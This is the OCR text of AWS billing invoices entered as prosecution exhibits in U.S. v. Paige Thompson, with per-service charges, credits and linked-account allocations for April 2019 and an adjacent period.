| Estimated US sales tax to be collected | $0.00 |
| **Amazon Elastic File System** | **$2.80** |
| Charges | $2.80 |
| Estimated US sales tax to be collected | $0.00 |
| **AWS CloudTrail** | **$0.00** |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **AWS Key Management Service** | **$0.00** |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon Virtual Private Cloud** | **$36.00** |
| Charges | $36.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon Kinesis** | **$75.60** |
| Charges | $75.60 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

904-008

Payer account number
0924



## Summary for Linked Account

| | |
|---|---|
| Allen Porter          1047) | $292.87 |
| Charges | $4,181.66 |
| Credits | ($3,888.78) |
| Estimated US sales tax to be collected | $0.00 |
| Account          1047 total allocated for this invoice | $292.87 |

## Detail for Linked Account

| | |
|---|---|
| Amazon Simple Storage Service | $1.66 |
| Charges | $1.66 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $22.36 |
| Charges | $22.36 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $0.00 |
| Charges | $0.34 |
| Credits | ($0.34) |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $130.48 |
| Charges | $130.48 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon DynamoDB | $66.27 |
| Charges | $66.27 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $0.00 |
| Charges | $3,888.44 |
| Credits | ($3,888.44) |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Virtual Private Cloud | $72.10 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
0924



| Charges | $72.10 |
|---|---|
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

10

904-010

Payer account number

0924



## Summary for Linked Account

| Allen Porter                0039) | $54.27 |
|---|---|
| Charges | $137.53 |
| Credits | ($83.26) |
| Estimated US sales tax to be collected | $0.00 |
| Account            0039 total allocated for this invoice | $54.27 |

## Detail for Linked Account

| Amazon Simple Storage Service | $0.01 |
|---|---|
| Charges | $0.01 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.12 |
| Charges | $0.12 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $0.00 |
| Charges | $0.22 |
| Credits | ($0.22) |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $54.14 |
| Charges | $54.14 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $0.00 |
| Charges | $83.04 |
| Credits | ($83.04) |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

904-011

# EXHIBIT 914



Account number: 8421

## Amazon Web Services, Inc. Invoice

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

**Invoice Summary**

| | |
|---|---|
| Invoice Number: | 7493 |
| Invoice Date: | May 3 , 2019 |
| **TOTAL AMOUNT DUE ON May 3 , 2019** | **$11,717.26** |

Bill to Address:
ATTN: Thomas Brenneke
590 Oak Meadow Dr
Lake Oswego , OR , 97034 , US

## This invoice is for the billing period April 1 - April 30 , 2019

Greetings from Amazon Web Services, we're writing to provide you with an electronic invoice for your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

### Summary

| AWS Service Charges | $11,717.26 |
|---|---|
| Charges | $13,298.81 |
| Credits | ($1,581.55) |
| Tax * | $0.00 |
| **Total for this invoice** | **$11,717.26** |

### Detail for Consolidated Bill

| AWS Lambda | $0.00 |
|---|---|
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Simple Storage Service** | **$92.84** |
| Charges | $92.84 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Relational Database Service** | **$1,510.49** |
| Charges | $1,510.49 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Service Provider:
(Not to be used for payment remittance)
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA  98109-5210 , US

1

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 914
Admitted_____

| | |
|---|---:|
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Secrets Manager** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Elastic Compute Cloud** | **$7,312.86** |
| Charges | $8,894.41 |
| Credits | ($1,581.55) |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Backup** | **$2.19** |
| Charges | $2.19 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Config** | **$8.19** |
| Charges | $8.19 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Simple Notification Service** | **$0.03** |
| Charges | $0.03 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Service Provider:
(Not to be used for payment remittance)
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA  98109-5210 , US

2

914-002

| Amazon Redshift | $180.00 |
|---|---|
| Charges | $180.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

| Amazon Elastic File System | $9.74 |
|---|---|
| Charges | $9.74 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

| AmazonCloudWatch | $942.57 |
|---|---|
| Charges | $942.57 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

| Amazon ElastiCache | $497.78 |
|---|---|
| Charges | $497.78 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

| Amazon CloudFront | $9.58 |
|---|---|
| Charges | $9.58 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

| Amazon Virtual Private Cloud | $71.90 |
|---|---|
| Charges | $71.90 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Service Provider:
(Not to be used for payment remittance)
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA  98109-5210 , US

| | |
|---|---|
| CT | $0.00 |
| **Amazon GuardDuty** | **$29.75** |
| Charges | $29.75 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Data Transfer** | **$230.43** |
| Charges | $230.43 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Simple Email Service** | **$0.01** |
| Charges | $0.01 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Directory Service** | **$0.19** |
| Charges | $0.19 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon EC2 Container Service** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon DynamoDB** | **$20.59** |
| Charges | $20.59 |
| VAT ** | $0.00 |
| GST | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Service Provider:
(Not to be used for payment remittance)
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA  98109-5210 , US

| | |
|---|---|
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon EC2 Container Registry (ECR)** | **$0.02** |
| Charges | $0.02 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Route 53** | **$20.97** |
| Charges | $20.97 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Elastic Container Service for Kubernetes** | **$720.00** |
| Charges | $720.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS WAF** | **$7.13** |
| Charges | $7.13 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS CloudTrail** | **$0.82** |
| Charges | $0.82 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Key Management Service** | **$18.00** |
| Charges | $18.00 |
| VAT ** | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Service Provider:
(Not to be used for payment remittance)
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA  98109-5210 , US

| | |
|---|---:|
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Simple Queue Service | $31.18 |
| Charges | $31.18 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

\* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Service Provider:
(Not to be used for payment remittance)
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA   98109-5210 , US

6

Payer account number

██████████ 8421



# LINKED ACCOUNT ALLOCATION

To learn more about how charges are allocated across linked accounts visit
https://docs.aws.amazon.com/awsaccountbilling/latest/aboutv2/con-bill-blended-rates.html

| Activity By Account | |
|---|---:|
| **Public Alerts** ██████ **4769)** | **$14.35** |
| Charges | $14.35 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Redux Operations** ██████ **1517)** | **$63.68** |
| Charges | $63.68 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **CryptoTrading Corp** ██████ **9544)** | **$808.76** |
| Charges | $808.76 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Waitrainer** ██████ **3625)** | **$761.53** |
| Charges | $2,343.07 |
| Credits | ($1,581.54) |
| Estimated US sales tax to be collected | $0.00 |
| **Lebook** ██████ **4337)** | **$265.00** |
| Charges | $265.00 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Volcanic Star** ██████ **4212)** | **$747.98** |
| Charges | $747.98 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Network Redux** ██████ **8421)** | **$27.31** |
| Charges | $27.31 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **CryptoTrading Stage** ██████ **9884)** | **$1,595.52** |
| Charges | $1,595.52 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number

_____ 8421



| | |
|---|---|
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Lunar Logic** _____ 5858) | **$239.63** |
| Charges | $239.63 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Tradelt Corp** _____ 9113) | **$105.70** |
| Charges | $105.70 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **NikeSB** _____ 1775) | **$166.03** |
| Charges | $166.03 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Adobe Spider Verse** _____ 7848) | **$320.98** |
| Charges | $320.98 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Owen Jones** _____ 8246) | **$83.75** |
| Charges | $83.75 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Redux Labs** _____ 7303) | **$432.85** |
| Charges | $432.85 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Redux Bastion** _____ 4135) | **$7.34** |
| Charges | $7.34 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **CryptoTrading QA** _____ 7608) | **$1,409.84** |
| Charges | $1,409.84 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

8

Payer account number
█████████ 8421



| Crypto Trading Dev ████████8935) | $0.00 |
|---|---|
| Charges | $0.00 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Adobe Hidden Treasures ████████5524) | $107.47 |
| Charges | $107.47 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Mystic Logistics ████████3887) | $307.27 |
| Charges | $307.27 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| TradeIt QA ████████5523) | $822.95 |
| Charges | $822.95 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CryptoTrading Prod ████████6117) | $2,994.65 |
| Charges | $2,994.65 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Dakota Funds ████████7491) | $339.79 |
| Charges | $339.79 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| TradeIt Prod ████████0246) | $94.85 |
| Charges | $94.85 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Total allocated for this invoice** | **$11,717.23** |

• There is a $0.03 difference between the sum of all linked account totals and your invoice total. This difference results from rounding of charges that are allocated from the Consolidated Billing account invoice to individual linked accounts.

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

9

Payer account number

8421



## Summary for Linked Account

| Public Alerts (4769) | $14.35 |
|---|---|
| Charges | $14.35 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 4769 total allocated for this invoice | $14.35 |

## Detail for Linked Account

| Amazon Simple Storage Service | $0.00 |
|---|---|
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.06 |
| Charges | $0.06 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $1.16 |
| Charges | $1.16 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $13.13 |
| Charges | $13.13 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

10

914-010

Payer account number

8421



## Summary for Linked Account

| Redux Operations 1517) | $63.68 |
|---|---|
| Charges | $63.68 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Account 1517 total allocated for this invoice** | **$63.68** |

## Detail for Linked Account

| Amazon Simple Storage Service | $3.70 |
|---|---|
| Charges | $3.70 |
| Estimated US sales tax to be collected | $0.00 |
| **AWS Data Transfer** | **$0.00** |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon Relational Database Service** | **$14.54** |
| Charges | $14.54 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon ElastiCache** | **$12.24** |
| Charges | $12.24 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon Elastic Compute Cloud** | **$33.20** |
| Charges | $33.20 |
| Estimated US sales tax to be collected | $0.00 |
| **AWS Key Management Service** | **$0.00** |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

11

914-011

Payer account number

8421



## Summary for Linked Account

| CryptoTrading Corp          9544) | $808.76 |
|---|---|
| Charges | $808.76 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account          9544 total allocated for this invoice | $808.76 |

## Detail for Linked Account

| AWS Lambda | $0.00 |
|---|---|
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Storage Service | $1.71 |
| Charges | $1.71 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $32.30 |
| Charges | $32.30 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon DynamoDB | $6.01 |
| Charges | $6.01 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $605.11 |
| Charges | $605.11 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Config | $0.03 |
| Charges | $0.03 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $1.70 |
| Charges | $1.70 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

12

914-012

Payer account number

8421



| AmazonCloudWatch | $147.90 |
|---|---|
| Charges | $147.90 |
| Estimated US sales tax to be collected | $0.00 |
| **AWS WAF** | **$7.13** |
| Charges | $7.13 |
| Estimated US sales tax to be collected | $0.00 |
| **AWS CloudTrail** | **$0.00** |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon CloudFront** | **$5.87** |
| Charges | $5.87 |
| Estimated US sales tax to be collected | $0.00 |
| **AWS Key Management Service** | **$1.00** |
| Charges | $1.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

13

914-013

Payer account number

8421



### Summary for Linked Account

| Waitrainer 3625) | $761.53 |
|---|---|
| Charges | $2,343.07 |
| Credits | ($1,581.54) |
| Estimated US sales tax to be collected | $0.00 |
| Account 3625 total allocated for this invoice | $761.53 |

### Detail for Linked Account

| Amazon Simple Storage Service | $0.17 |
|---|---|
| Charges | $0.17 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $2.83 |
| Charges | $2.83 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $20.77 |
| Charges | $20.77 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Secrets Manager | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS CloudTrail | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $734.22 |
| Charges | $2,315.76 |
| Credits | ($1,581.54) |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $2.00 |
| Charges | $2.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

14

Payer account number

8421



| | |
|---|---|
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $1.53 |
| Charges | $1.53 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of
this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

15

914-015

Payer account number

8421



| Summary for Linked Account | |
|---|---|
| Lebook          4337) | $265.00 |
| Charges | $265.00 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account          4337 total allocated for this invoice | $265.00 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $0.13 |
| Charges | $0.13 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.15 |
| Charges | $0.15 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $3.56 |
| Charges | $3.56 |
| Estimated US sales tax to be collected | $0.00 |
| AWS CloudTrail | $0.02 |
| Charges | $0.02 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $261.14 |
| Charges | $261.14 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

16

Payer account number

████████ 8421



## Summary for Linked Account

| Volcanic Star ████████ 4212) | $747.98 |
|---|---|
| Charges | $747.98 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account ████ 4212 total allocated for this invoice | $747.98 |

## Detail for Linked Account

| Amazon Simple Storage Service | $70.72 |
|---|---|
| Charges | $70.72 |
| Estimated US sales tax to be collected | $0.00 |
| **AWS Lambda** | **$0.00** |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **AWS Data Transfer** | **$144.80** |
| Charges | $144.80 |
| Estimated US sales tax to be collected | $0.00 |
| **AmazonCloudWatch** | **$16.30** |
| Charges | $16.30 |
| Estimated US sales tax to be collected | $0.00 |
